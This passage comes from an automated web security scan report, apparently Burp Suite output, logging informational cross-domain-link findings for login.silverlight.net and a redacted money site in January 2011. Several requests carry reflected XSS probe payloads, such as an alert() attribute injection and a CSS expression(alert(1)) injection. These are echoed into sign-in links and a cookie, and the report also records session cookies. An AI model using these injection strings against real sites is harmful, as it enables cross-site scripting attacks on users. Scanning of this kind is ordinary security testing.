<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351901&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351901&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351901&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631">here</a>
...[SNIP]...

22.162. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351161&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

GET /login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=wqo1tq45lu021p45xivwc2fl; omniID=1296343609010_276c_8196_7f44_eaa48f639648; s_cc=true; s_sq=%5B%5BB%5D%5D
Host: login.silverlight.net
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:32:41 GMT
Content-Length: 12978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351161&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351161&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351161&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631">here</a>
...[SNIP]...

22.163. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344490&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13089
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:51:30 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:41:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344490&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344490&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344490&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">here</a>
...[SNIP]...

22.164. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx

The response contains the following link to another domain:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296405111&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:41:51 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:31:51 GMT
Content-Length: 15108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
The Of
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296405111&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631">here</a>
...[SNIP]...

22.165. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351883&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

GET /login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
Cookie: omniID=1296343609010_276c_8196_7f44_eaa48f639648; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wqo1tq45lu021p45xivwc2fl
Host: login.silverlight.net
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:44:43 GMT
Content-Length: 12978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351883&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351883&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351883&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631">here</a>
...[SNIP]...

22.166. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351981&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:46:21 GMT
Content-Length: 12978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351981&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351981&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351981&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631">here</a>
...[SNIP]...

22.167. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx

The response contains the following link to another domain:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343071&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:51 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:51 GMT
Content-Length: 15108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
The Of
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343071&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631">here</a>
...[SNIP]...

22.168. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296408751&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:32:31 GMT
Content-Length: 12978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296408751&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296408751&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296408751&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631">here</a>
...[SNIP]...

22.169. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296405091&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13089
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:41:31 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:31:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296405091&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296405091&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296405091&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">here</a>
...[SNIP]...

22.170. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx981cd"style%3d"x%3aexpression(alert(1))"27f64f44305

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343600&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wqo1tq45lu021p45xivwc2fl; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx981cd"style="x:expression(alert(1))"27f64f44305; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:36:40 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:40 GMT
Content-Length: 13452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343600&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343600&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343600&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&lc=1033&id=265631">here</a>
...[SNIP]...

22.171. http://money.redacted// previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	//

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted//?4ae1b

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://money.bundle.com/article/study-women-aim-lower-get-paid-less
http://money.bundle.com/articles/politics-and-market/
http://money.bundle.com/articles/smart-spending/
http://money.bundle.com/articles/your-money/
http://money.bundle.com/categories/
http://money.bundle.com/category/NFCC-ask-debt-expert/
http://money.bundle.com/category/market-talk/
http://money.bundle.com/category/women-in-red/
http://msn.careerbuilder.com/Article/MSN-2461-Job-Info-and-Trends-I-cant-believe-I-get-paid-to-do-this/?SiteId=cbmsnmn42461&sc_extcmp=JS_2461_money
http://msn.careerbuilder.com/Article/MSN-2477-Career-Growth-and-Change-Career-catch-22-How-do-you-get-experience-if-nobody-will-hire-you-without-any/?SiteId=cbmsnmn42477&sc_extcmp=JS_2477_money
http://msn.careerbuilder.com/Article/MSN-2480-Workplace-Issues-Lets-do-lunch-Why-a-midday-break-may-make-you-a-better-employee/?SiteId=cbmsnmn42480&sc_extcmp=JS_2480_money
http://msn.careerbuilder.com/Article/MSN-2481-Cover-Letters-Resumes-How-to-personalize-your-cover-letter-and-get-the-hiring-managers-attention/?SiteId=cbmsnmn42481&sc_extcmp=JS_2481_money
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnmn42482&sc_extcmp=JS_2482_money
http://msn.careerbuilder.com/Article/MSN-2484-Salaries-Promotions-What-popular-TV-can-teach-you-about-professional-success/?SiteId=cbmsnmn42484&sc_extcmp=JS_2484_money
http://msn.careerbuilder.com/Article/MSN-2486-Leadership-Management-How-not-to-motivate-employees-10-management-habits-to-break-now/?SiteId=cbmsnmn42486&sc_extcmp=JS_2486_money
http://msn.careerbuilder.com/Article/MSN-2487-Leadership-Management-10-tips-for-managing-the-Facebook-generation/?SiteId=cbmsnmn42487&sc_extcmp=JS_2487_money
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=history+of+the+gold+standard&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296417169&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2F%3F4ae1b&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=abfFFnGL&resize=false

Request

GET //?4ae1b HTTP/1.1
Host: money.redacted
Proxy-Connection: keep-alive
Referer: http://burp/show/37
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

22.172. http://money.redacted// previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
